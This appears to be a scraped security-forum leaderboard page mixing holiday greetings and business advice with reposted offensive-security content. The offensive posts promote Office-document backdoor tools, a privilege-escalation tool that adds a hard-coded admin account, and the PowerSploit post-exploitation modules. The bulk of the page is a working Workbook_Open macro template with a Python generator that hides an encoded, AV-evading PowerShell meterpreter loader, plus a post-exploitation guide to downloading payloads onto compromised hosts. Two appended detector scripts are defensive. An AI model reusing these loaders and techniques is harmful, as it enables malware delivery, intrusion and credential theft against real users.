
Leaderboard

Popular Content

Showing content with the highest reputation on 04/16/17 in all areas

  1. I want to wish all the users of this forum a happy Easter and many joys and achievements ahead! Happy hacking Easter! I also want to mention a few people on the forum who have helped me a lot so far, and I promise I will return the favour: @Usr6 @Gecko @aelius @badluck @theandruala @j1ll2013 @MrGrj -- Ganjaa
    3 points
  2. Thank you! May the Holy Easter holidays bring you, first of all, what cannot be bought: health, love and friendship!
    1 point
  3. To minimise taxes and for the other advantages, I recommend an S.R.L. These days you can practically set up an S.R.L. for 300 RON if you handle the paperwork yourself. At the ONRC the name reservation is free and you do it online yourself, everything that counts as fees comes to under 50 RON, and the 200 RON of share capital that you have to deposit at the bank to set up the company can be used later. For accounting, learn a little yourself, the basics, then work with an accountant who files your returns for you (for online filing you need an electronic signature, which costs about 250 RON/year). You will surely find an accountant who does your monthly closings while you do the maintenance on their computers/office: database backups, Windows updates, router setup, printer maintenance, toner cartridge refills, setting up the laptop to reach the internal network from the park, installing ZUMA, SIMS, changing the bulb/socket, dusting, making coffee, building a website for the accounting office, SEO, mopping the floor, etc. Optionally, you can also give the accountant a smack on the behind. If you still have questions, ask specifically what you want to know and I will answer. To practise accounting, you can download and install SAGA. It is free, very easy to use, and there is a ton of documentation and examples on their forum.
    1 point
  4. because trolls and because shemale
    1 point
  5. A simple tool, nothing very special, but it quickly and easily creates a backdoor for Office exploitation using Metasploit module packets. Targets include Microsoft Office on Windows or Mac, OpenOffice on Linux, macro attacks, and the buffer overflow in Word. Works on Kali Rolling, Parrot and Backbox. Download: https://github.com/Screetsec/Microsploit
    1 point
  6. +1 Yes, to hell with Romania, with the filth and grime you find on every street corner, and leave.
    1 point
  7. RUN. RUN FAR AWAY FROM THERE. DO NOT GIVE THE SCAMMERS A SINGLE PENNY. MY ADVICE IS DO NOT OPEN ANYTHING AND LEAVE AS FAST AS YOU CAN
    1 point
  8. TempRacer – Windows Privilege Escalation Tool (March 29, 2016)

TempRacer is a Windows Privilege Escalation Tool written in C# designed to automate the process of injecting user creation commands into batch files with administrator level privileges. The code itself is not using that many resources because it relies on callbacks from the OS. You can keep it running for the whole day to try and catch the creation of an admin level batch file. It's especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs you should give it a try. If successful it will inject the code to add the user "alex" with password "Hack123123" and add him to the local administrator group. It will also block the file for further changes, so the privilege escalation code stays inside.

You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework. And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner.

You can download TempRacer here: – TempRacer.exe – tempracer-1.zip (Source). Or read more here.

Source: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/
    1 point
  9. PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

CodeExecution - Execute code on a target machine.
  Invoke-DllInjection - Injects a Dll into the process ID of your choosing.
  Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
  Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally.
  Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

ScriptModification - Modify and/or prepare scripts for execution on a compromised machine.
  Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
  Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
  Out-EncryptedScript - Encrypts text files/scripts.
  Remove-Comments - Strips comments and extra whitespace from a script.

Persistence - Add persistence capabilities to a PowerShell script.
  New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function.
  New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function.
  Add-Persistence - Add persistence capabilities to a script.
  Install-SSP - Installs a security support provider (SSP) dll.
  Get-SecurityPackages - Enumerates all loaded security packages (SSPs).

AntivirusBypass - AV doesn't stand a chance against PowerShell!
  Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

Exfiltration - All your data belong to me!
  Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users' logon tokens, and impersonates logon tokens in the current thread.
  Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
  Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
  Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
  Get-Keystrokes - Logs keys pressed, time and the active window.
  Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
  Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder.
  New-VolumeShadowCopy - Creates a new volume shadow copy.
  Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies.
  Mount-VolumeShadowCopy - Mounts a volume shadow copy.
  Remove-VolumeShadowCopy - Deletes a volume shadow copy.
  Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials.
  Out-Minidump - Generates a full-memory minidump of a process.

Mayhem - Cause general mayhem with PowerShell.
  Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice.
  Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell.

Privesc - Tools to help with escalating privileges on a target.
  PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors.

Recon - Tools to aid in the reconnaissance phase of a penetration test.
  Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
  Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
  Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records.
  PowerView - PowerView is a series of functions that performs network and Windows domain enumeration and exploitation.

Recon\Dictionaries - A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources:
  admin.txt - http://cirt.net/nikto2/
  generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
  sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

License
The PowerSploit project and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.

Usage
Refer to the comment-based help in each individual script for detailed usage information.

To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.

The default per-user module path is:
"$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"

The default computer-level module path is:
"$Env:windir\System32\WindowsPowerShell\v1.0\Modules"

To use the module, type: Import-Module PowerSploit
To see the commands imported, type: Get-Command -Module PowerSploit

If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:
$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} }

For help on each individual command, Get-Help is your friend.

Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.

Link: https://github.com/PowerShellMafia/PowerSploit
    1 point
  10. Embedding Veil Powershell payloads into Office Documents

So upon reading Backdooring Office Documents, I wondered if I could achieve something with one of the Veil-framework Powershell payloads. The end goal being: if we had a user on an assessment open and run our macro (which happens more than I would like to admit), we could have a memory resident backdoor that would not get flagged by AV.

1. Veil Payload

To start, we would need to create a Veil (Veil install/documentation) Powershell payload. Upon opening Veil, we'll just enter:

use powershell/VirtualAlloc
generate

This will start the process for generating our specific Powershell payload. Veil allows for not only msfvenom payloads, but also custom shellcode. Here, we are going to simply use meterpreter/reverse_http. Oh and, in case you were wondering, Veil supports tab completion on the msfvenom payloads! Once the shellcode is generated, we then name our output and take note of its location. Oh, and move it to our Office machine.

2. Office Macros

Now onto embedding the payload into an office document. Open Office, head to the developer tab, and open the Visual Basic editor. From here, open the payload.bat from Veil in a text editor, and copy the first section (x86) from the word powershell until the end of the first if statement. We will need to create a new Sub, "Workbook_Open()", create two new String objects, "exec" and "str", and paste this as the string value for "exec" in the VBA pane.

Sub Workbook_Open()
Dim exec As String
Dim str As String
str = ""
exec = "[entire string]"

Of course it complains, but this is okay since we will fix this by using string concatenation. Head to the string just after "FromBase64_decrypt" and cut the entire section in between the quotation marks. Insert this string as the "str" value.

str = "[Value]"

The string is still too long!
Ok, let's split it in half and concatenate the string back together one line later:

str = "[Value A]"
str = str + "[Value B]"

Now, we can call the variable "str" in between the quotation marks. Next, we need to properly escape all the quotations on the line by changing \" to \"". There are occurrences before "Invoke-Expression", and before and after the variable "str". Finally, we place the entire thing into a Shell(). Our VBA editing is complete. We could continue breaking up the strings and concatenating them back numerous times if need be to make things easy to read or fit into a blog! Below is a copy/paste friendly (read: cleaner) template. Also, considering how tedious this can be by hand, I wrote a python script, also below, that automates moving this into a vba-friendly output.

Template:

Sub Workbook_Open()
Dim exec As String
Dim str As String
str = "[half payload value]"
str = str + "[half payload value]"
exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command"
exec = exec + " ""Invoke-Expression $(New-Object IO.StreamReader "
exec = exec + "($(New-Object IO.Compression.DeflateStream "
exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]"
exec = exec + "::FromBase64String(\"" " & str & " \""))))),"
exec = exec + "[IO.Compression.CompressionMode]::Decompress)),"
exec = exec + "[Text.Encoding]::ASCII)).ReadToEnd();"" "
Shell(exec)
End Sub

Macro_safe.py: (google drive download here) (new github link here, part of the MacroShop repository)

#!/usr/bin/python
#####
# macro_safe.py
#####
#
# Takes Veil powershell batch file and outputs into a text document
# macro safe text for straight copy/paste.
#
import os, sys
import re


def formStr(varstr, instr):
    # First line holds the first 54 characters, then 'var = var + "..."'
    # lines of 48 characters each, joined with CRLF.
    holder = []
    str1 = ''
    str2 = ''
    str1 = varstr + ' = "' + instr[:54] + '"'
    for i in xrange(54, len(instr), 48):
        holder.append(varstr + ' = ' + varstr + ' + "' + instr[i:i+48])
    str2 = '"\r\n'.join(holder)
    str2 = str2 + "\""
    str1 = str1 + "\r\n" + str2
    return str1


# Both the input batch file and the output text file are required.
if len(sys.argv) < 3:
    print "----------------------\n"
    print " Macro Safe\n"
    print "----------------------\n"
    print "\n"
    print "Takes Veil batch output and turns into macro safe text\n"
    print "\n"
    print "USAGE: " + sys.argv[0] + " <input batch> <output text>\n"
    print "\n"
else:
    fname = sys.argv[1]
    f = open(fname)
    lines = f.readlines()
    f.close()
    cut = []
    for line in lines:
        # split on else to truncate the back half
        first = line.split('else')
        # split on \"
        cut = first[0].split('\\"', 4)
        # get rid of everything before powershell
        cut[0] = cut[0].split('%==x86')[1]
        cut[0] = cut[0][2:]
        # get rid of trailing parenthesis
        cut[2] = cut[2].strip(" ")
        cut[2] = cut[2][:-1]
        # for i in range(0,3):
        #     print str(i) + " " + cut
    top = "Sub Workbook_Open()\r\n"
    top = top + "Dim str As String\r\n"
    top = top + "Dim exec As String\r\n"
    # insert '\r\n' and 'str = str +' every 48 chars after the first 54.
    payL = formStr("str", str(cut[1]))
    # double up double quotes, add the rest of the exec string
    idx = cut[0].index('"')
    cut[0] = cut[0][:idx] + '"' + cut[0][idx:]
    cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] + "\""
    # insert 'exec = exec +' and '\r\n' every 48 after the first 54.
    execStr = formStr("exec", str(cut[0]))
    shell = "Shell(exec)"
    bottom = "End Sub\r\n\r\n\'---Generated by macro_safe.py by khr040sh---"
    final = ''
    final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n"
    print final
    try:
        f = open(sys.argv[2], 'w')
        f.write(final)  # python will convert \n to os.linesep
        f.close()
    except:
        print "Error writing file.\n Please check permissions and try again.\nExiting..."
        sys.exit(1)
    print "File written to " + sys.argv[2] + " !"
Sample output from python code (payload string lines omitted):

Sub Workbook_Open()
Dim str As String
Dim exec As String
exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec = exec + "ader ($(New-Object IO.Compression.DeflateStream "
exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec = exec + "ression.CompressionMode]::Decompress)), [Text.En"
exec = exec + "coding]::ASCII)).ReadToEnd();"""
Shell(exec)
End Sub

'---Generated by macro_safe.py by khr040sh---

[EDITED: UPDATED python link]

Source: https://khr0x40sh.wordpress.com/2014/06/02/embedding-veil-powershell-payloads-into-office-documents/
    1 point
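A defender's counterpart to the macro layout described in the post above, added here as an example (it is not code from the post or from the MacroShop repository). Chunking "str" and "exec" into 48-character literals scatters markers such as FromBase64String and -Command across lines, so a plain grep of the VBA source misses them; the scanner below rebuilds each String variable by following the `v = "..."`, `v = v + "..."` and `& var &` assignments before matching. The sample macro, the indicator names and the regexes are constructed for this example.

```python
import re

# Constructed sample macro (not the post's generated output): the layout that
# macro_safe.py emits, with placeholder text where the base64 payload would be.
SAMPLE_MACRO = r'''Sub Workbook_Open()
Dim str As String
Dim exec As String
str = "PLACEHOLDER_BASE64_PART_1"
str = str + "PLACEHOLDER_BASE64_PART_2"
exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec = exec + "ader ($(New-Object IO.Compression.DeflateStream "
exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec = exec + "ression.CompressionMode]::Decompress)), [Text.En"
exec = exec + "coding]::ASCII)).ReadToEnd();"""
Shell(exec)
End Sub
'''

# `name = <expression>` on one line (VBA `_` line continuation is not handled here).
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# A VBA string literal ("" inside it is an escaped quote), an identifier, or glue.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)|[+&\s]+')


def evaluate_rhs(rhs, values):
    """Concatenate the literals and already-known variables on the right-hand side."""
    parts = []
    for m in TOKEN.finditer(rhs):
        if m.group(1) is not None:          # string literal, un-double the quotes
            parts.append(m.group(1).replace('""', '"'))
        elif m.group(2) is not None:        # variable reference: `exec + ...` or `& str &`
            parts.append(values.get(m.group(2), ''))
    return ''.join(parts)


def reassemble_strings(vba_source):
    """Return {variable: final string value} for every string-building assignment."""
    values = {}
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if m and '"' in m.group(2):
            values[m.group(1)] = evaluate_rhs(m.group(2), values)
    return values


# Markers visible in the raw VBA text regardless of chunking.
STRUCTURE = {
    "auto-executing entry point": re.compile(
        r'\bSub\s+(Workbook_Open|Document_Open|Auto_Open|AutoOpen)\b', re.I),
    "process launch from macro": re.compile(r'\bShell\s*\(|WScript\.Shell', re.I),
}
# Markers that chunking may split across literals; matched on the rebuilt strings.
COMMAND = {
    "powershell launcher": re.compile(r'powershell(\.exe)?\b', re.I),
    "execution policy bypass": re.compile(r'-Exec(utionPolicy)?\s+Bypass', re.I),
    "hidden window": re.compile(r'-W(indowStyle)?\s+Hidden', re.I),
    "base64 decode": re.compile(r'FromBase64String', re.I),
    "in-memory execution": re.compile(r'Invoke-Expression|\bIEX\b', re.I),
    "decompression of payload": re.compile(r'DeflateStream|GZipStream', re.I),
}


def raw_text_hits(vba_source):
    """Command markers matched on the raw text only, to show what chunking hides."""
    return [name for name, rx in COMMAND.items() if rx.search(vba_source)]


def analyze_macro(vba_source):
    """Indicators found in the raw text, then in each rebuilt string variable."""
    findings = [name for name, rx in STRUCTURE.items() if rx.search(vba_source)]
    for var, value in reassemble_strings(vba_source).items():
        findings += [f"{name} (in rebuilt '{var}')"
                     for name, rx in COMMAND.items() if rx.search(value)]
    return findings


if __name__ == "__main__":
    print("raw text only:", raw_text_hits(SAMPLE_MACRO))
    for finding in analyze_macro(SAMPLE_MACRO):
        print("-", finding)
```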
  11. If you write Python (or PHP, Node.js, etc.) and want a 'test' environment to deploy the application to, you can confidently use Heroku (Cloud Application Platform). I use Heroku for deploying Django applications, and what I like is that I don't have to bother with a lot of configuration for a test environment (configuration like this). So, here is a short introductory tutorial on deploying an application to Heroku:

1. Install the Heroku Toolbelt

(venv)~/p/s/project git:develop ??? wget -O- https://toolbelt.heroku.com/install-ubuntu.sh | sh

2. Log in with your Heroku credentials

(venv)~/p/s/project git:develop ??? heroku login

You will be asked for a username/password.

3. Assuming you are in the application's directory: create a Procfile that will run the WSGI server for the app (WSGI because I'm talking about Python right now). Something like:

web: gunicorn projectdjango.wsgi --log-file -

Make sure you put gunicorn in requirements.txt in this case. At deploy time the Heroku Dyno will look in requirements.txt and install all the dependencies automatically.

4. Create a remote repo on Heroku. Initialise the repo (if you don't already have one that you use on Bitbucket/GitHub):

git init

Create the remote repository you will push the code to:

heroku create

5. The actual deploy:

git push heroku master

Broadly, what happens is that your Heroku server gets a repo associated with it; when you push to the remote repo, the Heroku dyno knows to pull + install requirements + restart gunicorn. If you have questions, I'll try to answer them.
    1 point
  12. Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files. There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will be covered in this blog.

PowerShell file download
Visual Basic file download
Perl file download
Python file download
Ruby file download
PHP file download or upload
FTP file download
TFTP file download
Bitsadmin file download
Wget file download
Netcat file download
Windows share file download
Notepad dialog box file download
Exe to Text, Text to EXE with PowerShell and Nishang
Csc.exe to compile from source file

Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.

PowerShell File Download

PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:\%homepath%\file")

To execute this script, run the following command in a PowerShell window:

PS C:\> .\test.ps1

Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:

C:\>powershell set-executionpolicy unrestricted

Visual Basic File Download

The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite a bit larger than the PowerShell one.

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile "C:\%homepath%\file", 2 '
end with

Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above. To execute this script, run the following command in a command shell:

C:\>cscript test.vbs

The following four languages are non-native to Windows machines. However, if you find a machine with any of these languages installed on it (regardless of the OS), you can leverage these scripts to download files.

Perl File Download

Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host.

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

To execute this script, run the following command in a command shell:

root@kali:~# perl test.pl

Python File Download

Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task.

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')
localFile.write(u.read())
localFile.close()

To execute this script, run the following command in a command shell:

root@kali:~# python test.py

Ruby File Download

Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files.

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file|
    file.write(r.body)
  }
}

To execute this script, run the following command in a command shell:

root@kali:~# ruby test.rb

PHP File Download

PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language.

#!/usr/bin/php
<?php
$data = @file_get_contents("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data);
fclose($fh);
?>

To execute this script, run the following command in a command shell:

root@kali:~# php test.php

The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions.

FTP File Download

For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps run without the need for interaction.

ftp 127.0.0.1
username
password
get file
exit

TFTP File Download

Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command:

tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

Bitsadmin File Download

Bitsadmin is a command-line tool for Windows that allows a user to create download or upload tasks.

bitsadmin /transfer n http://domain/file c:\%homepath%\file

Wget File Download

Wget is a Linux and Windows tool that allows for non-interactive downloads.

wget http://example.com/file

Netcat File Download

Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific. On the attacker's computer, type:

cat file | nc -l 1234

This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP. The following command should be run on the machine the attacker is targeting:

nc host_ip 1234 > file

This will connect the target to the attacker's computer and receive the file that will be sent over the connection.

Windows Share File Download

Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands. To mount a remote drive, type:

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Notepad Dialog Box File Download

If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal.

1. Open notepad
2. Go to File - Open
3. In the File Name box near the bottom, type in the full URL path to your file

Notepad is kind enough to go out and grab the contents of this file for you.

Exe to Txt, and Txt to Exe with PowerShell and Nishang

This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here. To convert the exe to a hex file, type:

PS > .\ExetoText.ps1 evil.exe evil.txt

Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang. To convert the hex file back to an exe, type:

PS > .\TexttoExe.ps1 evil.txt evil.exe

This will result in your evil exe being successfully moved to the target machine.

Csc.exe to Compile Source from a File

C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity. The default location for this executable is the following:

C:\Windows\Microsoft.NET\Framework\version

Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code.

public class Evil {
    public static void Main() {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        startInfo.FileName = "cmd.exe";
        startInfo.Arguments = "/C net users > C:\\Temp\\users.txt";
        process.StartInfo = startInfo;
        process.Start();
    }
}

To compile your source code, type:

csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs

Wrap up

Hopefully this blog has given you viable options for getting your files (malicious or otherwise) over to a server.

Source: https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file
    1 point
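The detection side of the techniques in the post above, as an added example that is not part of the NetSPI post: a scanner run over constructed process-creation records (the key=value layout, hostnames, users and paths are all assumed for this example) that flags the command lines a bitsadmin, WebClient, tftp, csc.exe, net use or wget transfer would leave in endpoint telemetry, plus the execution-policy change the post mentions.

```python
import re

# Constructed process-creation records (not real telemetry) in a key=value layout
# assumed for this example. Each suspicious line mirrors a command from the post;
# the last two are benign controls that must not alert.
SAMPLE_LOG = r'''2017-04-16T10:01:02Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer n http://domain/file c:\Users\jdoe\file"
2017-04-16T10:02:11Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -c "$p = New-Object System.Net.WebClient; $p.DownloadFile('http://domain/file', 'C:\Users\jdoe\file')""
2017-04-16T10:02:40Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell set-executionpolicy unrestricted"
2017-04-16T10:03:05Z host=WS02 user=CORP\svc_build image=C:\Windows\System32\tftp.exe cmdline="tftp -i 10.0.0.5 GET C:\Users\svc_build\file file"
2017-04-16T10:03:30Z host=WS02 user=CORP\svc_build image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe cmdline="csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs"
2017-04-16T10:04:00Z host=WS02 user=CORP\svc_build image=C:\Windows\System32\net.exe cmdline="net use x: \\10.0.0.5\share /user:example.com\userID myPassword"
2017-04-16T10:04:20Z host=WS03 user=CORP\jdoe image=C:\Tools\wget.exe cmdline="wget http://example.com/file"
2017-04-16T10:05:00Z host=WS03 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline="notepad C:\Users\jdoe\notes.txt"
2017-04-16T10:05:30Z host=WS03 user=CORP\jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell Get-Process"
'''

# One rule per technique from the post; names and patterns are constructed here.
RULES = [
    ("BITS transfer via bitsadmin",            r'\bbitsadmin(\.exe)?\s+/transfer\b'),
    ("PowerShell WebClient download",          r'Net\.WebClient|\.Download(File|String)\s*\('),
    ("PowerShell execution policy weakened",   r'set-executionpolicy\s+(unrestricted|bypass)\b'),
    ("TFTP client transfer",                   r'\btftp(\.exe)?\s+-i\b'),
    ("Ad-hoc compile with csc.exe",            r'\bcsc(\.exe)?\b.*?/out:'),
    ("Share mapped with explicit credentials", r'\bnet(\.exe)?\s+use\s+\S+\s+\\\\\S+.*?/user:'),
    ("wget download",                          r'\bwget(\.exe)?\s+\S*https?://'),
    ("netcat file receive",                    r'\bnc(\.exe)?\s+\S+\s+\d+\s*>'),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]

LINE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
                  r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>.*)"$')


def parse_record(line):
    """Split one record into its fields; None for lines that do not fit the layout."""
    m = LINE.match(line.strip())
    return m.groupdict() if m else None


def scan_log(text):
    """Run every rule over every record's command line; one alert per matching rule."""
    alerts = []
    for raw in text.splitlines():
        rec = parse_record(raw)
        if rec is None:
            continue
        for technique, rx in COMPILED:
            if rx.search(rec["cmdline"]):
                alerts.append({"technique": technique, **rec})
    return alerts


def summarize(alerts):
    """Count alerts per (host, user) so a burst of techniques in one session stands out."""
    counts = {}
    for a in alerts:
        key = (a["host"], a["user"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["host"]} {a["user"]}: {a["technique"]} <- {a["cmdline"]}')
    print(summarize(found))
```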
  13. Not true. https://www.facebook.com/careers/search/?q=&defined=http('meth:post'/data='q=/xss:protection')&location=null False. -1
    -2 points